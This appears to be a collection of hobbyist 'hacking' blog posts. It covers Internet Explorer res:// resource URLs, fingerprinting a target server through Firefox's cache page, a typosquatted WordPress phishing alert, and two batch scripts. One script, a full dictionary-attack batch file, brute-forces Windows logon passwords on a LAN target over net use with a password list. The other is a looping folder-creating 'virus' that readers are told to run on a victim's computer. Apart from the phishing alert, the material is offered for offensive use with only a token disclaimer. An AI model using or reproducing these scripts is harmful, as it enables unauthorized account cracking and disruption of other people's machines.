Internet Explorer Hacks

Internet Explorer fetches its icons and Gifs from a DLL file that is associated with explorer.exe. The dll file that is required for the Background script processing of Internet Explorer is “shdoclc.dll” and is located in “C:\windows\system32\shdoclc.dll“

Here are few thing i found out, when exploring the MS-IE. I have opened up the Dll file (shdoclc.dll),analyzed it and found some interesting stuffs, that would be really helpful for Browser Developers and Novice Hackers who want to play pranks with Newbies.

Note : This applies and works only on IE.

As everyone Knows about:blank is used to set the page Blank, likewise there are few other resources that are available for IE and can be fetched from the shdoclc.dll.

IE Fetches all the error codes as well as scripts and messages from shdoclc.dll,

Say If you are getting an error stating “HTTP Error 403 – Forbidden“, this message too is fetched from the shdoclc.dll, so what happens here incase of “Error 403 – Forbidden
” is that it will contact the “http_403.htm” file located in the dll, where you can access this manually just by typing the given URL in the address bar and hit enter.

res://shdoclc.dll/http_403.htm

Likewise it has error message and stuffs realted to the background processing of IE and here it is indexed below, just explore it and have fun……

Here you can Find the Icon and some Image files,

res://shdoclc.dll/end_inactive.gif
res://shdoclc.dll/pagerror.gif
res://shdoclc.dll/begin.gif
res://shdoclc.dll/back.gif
res://shdoclc.dll/refresh.gif
res://shdoclc.dll/search.gif
res://shdoclc.dll/flag.gif
res://shdoclc.dll/begin_hilite.gif
res://shdoclc.dll/lines.bmp
res://shdoclc.dll/ie.gif
res://shdoclc.dll/ie256.gif
res://shdoclc.dll/world.bmp
res://shdoclc.dll/world256.gif
res://shdoclc.dll/ie5.gif
res://shdoclc.dll/end.gif
res://shdoclc.dll/end_hilite.gif
res://shdoclc.dll/end_inactive.gif
res://shdoclc.dll/next.gif
res://shdoclc.dll/next_hilite.gif
res://shdoclc.dll/next_inactive.gif
res://shdoclc.dll/prev.gif
res://shdoclc.dll/prev_hilite.gif
res://shdoclc.dll/prev_inactive.gif
res://shdoclc.dll/printctl.gif
res://shdoclc.dll/printctl_hilite.gif
res://shdoclc.dll/zoom_inactive.gif
res://shdoclc.dll/zoomin.gif
res://shdoclc.dll/zoomin_hilite.gif
res://shdoclc.dll/zoomout.gif
res://shdoclc.dll/zoomout_hilite.gif
res://shdoclc.dll/page.gif
res://shdoclc.dll/link.gif
res://shdoclc.dll/image.gif

Here you can really explore few Interesting stuffs regarding error codes adn crash reporting and so on….

res://shdoclc.dll/privacypolicytransform.xsl
res://shdoclc.dll/about.dlg
res://shdoclc.dll/error.dlg
res://shdoclc.dll/ieerror.dlg
res://shdoclc.dll/navcancl.htm
res://shdoclc.dll/offcancl.htm
res://shdoclc.dll/findinc.dlg
res://shdoclc.dll/bidifind.dlg
res://shdoclc.dll/find.dlg
res://shdoclc.dll/privacypolicy.dlg
res://shdoclc.dll/policylooking.htm
res://shdoclc.dll/policynone.htm
res://shdoclc.dll/policyerror.htm
res://shdoclc.dll/policysyntaxerror.htm
res://shdoclc.dll/preview.dlg
res://shdoclc.dll/pstemplate.dlg
res://shdoclc.dll/anchrppg.ppg
res://shdoclc.dll/imageppg.ppg
res://shdoclc.dll/docppg.ppg
res://shdoclc.dll/analyze.dlg
res://shdoclc.dll/wcee.htm
res://shdoclc.dll/http_400.htm
res://shdoclc.dll/http_403.htm
res://shdoclc.dll/http_406.htm
res://shdoclc.dll/http_410.htm
res://shdoclc.dll/http_500.htm
res://shdoclc.dll/http_501.htm
res://shdoclc.dll/http_gen.htm
res://shdoclc.dll/servbusy.htm
res://shdoclc.dll/dnserror.htm
res://shdoclc.dll/syntax.htm
res://shdoclc.dll/orgfav.dlg
res://shdoclc.dll/printerr.htm
res://shdoclc.dll/printnf.htm
res://shdoclc.dll/printunk.htm
res://shdoclc.dll/printnof.htm

If you have your own Domain, you can trick the Hackers who try to access your Admin Login Page. Most of the Novice Hackers would try to access the admin login page by trying www.site.com/admin, so instead of real Login you can place a fake HTML page admin.html that contains a Link that says “Admin Login” and you can use the Anchor tag to link to the “res://shdoclc.dll/http_403.htm“, so that you can customize you error page easily without start designing from the scratch.

Try this just by copying and pasting it in the address bar of IE and hit enter to have fun with Internet Explorer.

Information Gathering using Firefox

The First and foremost step in hacking would be the “Information Gathering“, many of them use various different Tools for the network Reconnaissance, but here is a trick that reveals you how to gather Information about the target system just by using a Browser “Firefox”.

The Information Gathering includes the following basics,….

Domain name and IP address
Open Ports
Daemon Banner Grabbing
OS Finger Printing
Server name and Type

Well, Domain name is the prime thing that you need, at least to identify the target, obtaining the IP address can be done just by pinging.

For the Open port detection, you might better go for third party tools and once the open ports are obtained you can use the telnet for the Daemon Banner grabbing, to know what the actual process thats running on the port along with its version info, so that you can easily launch an exploit to compromise the security if the daemon running on the target is a vulnerable one.

Here comes the real tough part “OS Fingerprinting“, most of them use ‘Nmap’ for obtaining OS info and also it is the right choice for doing so.

“Whois” – database will reveal what type of server is running on the target machine, but you can find it out just by using Firefox. You can really launch hell a lot of exploits if you know the server type on the target machine, and if it is IIS 6.0 or lesser, then it would make the task easier.

Open up the Firefox browser, and browse the target website just like a legitimate user, and once done with it open up a new tab (CTRL + T) and close the previous tab, type “about:cache” in the URL and hit enter and it will list you the following…

Memory cache device
Disk cache device
Offline cache device

Down below the “Disk cache device” click on the link that says “List Cache Entries“,
there you can see a brief history of the sites that you visited. Click on your target site’s link and it will display you the server type along with its version in a clear text, also you ca find the packet Header, Request method whether it is a Post or Get.
and down below you can analyze the payload of the datagram shown in hexa-decimal values.
This part is real interesting and looks similar to a Sniffer.

Now you got the server type and its version, and now you can launch exploits according to the version.

LAN Remote user – Dictionary Attack

Use this Batch file to launch a Dictionary attack and find the Windows logon Credentials in a LAN.
You need a Dictionary text file to proceed further to launch this attack successfully.

Just Follow the steps below,

1. Open up a Notepad file.
2. Copy and paste the below code and save it as a Batch file with .bat extension.

@echo off
if “%1″==”” goto fin
if “%2″==”” goto fin
del logfile.txt
FOR /F “tokens=1″ %%i in (passlist.txt) do ^
echo %%i && ^
net use \\%1\ipc$ %%i /u:%1\%2 2>>logfile.txt && ^
echo %time% %date% >> outfile.txt && ^
echo \\%1\ipc$ acct: %2 pass: %%i >> output.txt && goto end
:fin
echo *****Done*****

3. Make sure that you have a Dictionary Password Text file in the same location where you are going to execute this program. ( Name should be passlist.txt )
4. Now goto the command prompt and then execute this program from there, along with the Target compters IP address or Hostname and the Valid Username.

The Syntax should be like this,…
C:\>LANbrute.bat 192.169.21.02 Administrator

Where,

LANbrute.bat – This is the Name of the batch file that resides in the C Drive.

192.169.21.02 – IP Address of the Target Computer.

Administrator – Victim Account that you want to crack.

5. This program will start launching Dictionary Attack against the Adminstrator account on the Mahine 192.168.21.02, by using the passwords from the file passlist.txt and will not stop until it finds a right match.

6. If the right password was found, then it will save it in a text file named ‘output.txt’ on the same directory.

//Disclaimer : This is only meant for Educational Means, The members of this site is not responsible for whatever you do with this. //

WordPress Bloggers – Alert !

A Phihshing site has been setup that looks similar to wordpress.org and its prime  goal is to steal cookies as well as wordpress bloggers credentials.

Phishing address       :  www.wordpresz.org
Wordpress actucal site :  www.wordpress.org

The Technique used by Phishers to plant a domain name whose URL looks similar to the victims URL is called as ‘Typosquatting‘, and here too, the phishers used the same technique, so that if any one made a mistake in typing then they will be directed to a malicious site that looks similar to a real site, and when the visitors download something, then they are into trouble because that would be a ‘Backdoor’, where as the hackers can access the your system anonymously and can use it for developing  botnet and use it for several other malicious purposes.

www.wordpresz.org is sharing the IP address (209.160.33.108) with a fake online pharmacy www.livepills.com.

Folder Replicator Batch VIRUS

Here is a Simple batch virus that contains only 6 lines, has the tendency to replicate itself again and again and keeps on creating  a folder with same name, until a user stops it.

1. Just open up a notepad, copy and paste the below code

cd\
cd C:\Documents and Settings\username\Desktop
:loop
md Virus
cd Virus
goto loop

2. Save it as a batch file with the extension .bat, before doing that you have to modify the code by changing the place where it says ‘username’ and instead of that replace it by the currently logged in username.
3. Then run it on the Victims computer to infect it.
4. Any how it doesnt cause much harm, but replicates folder inside a folder and goes on.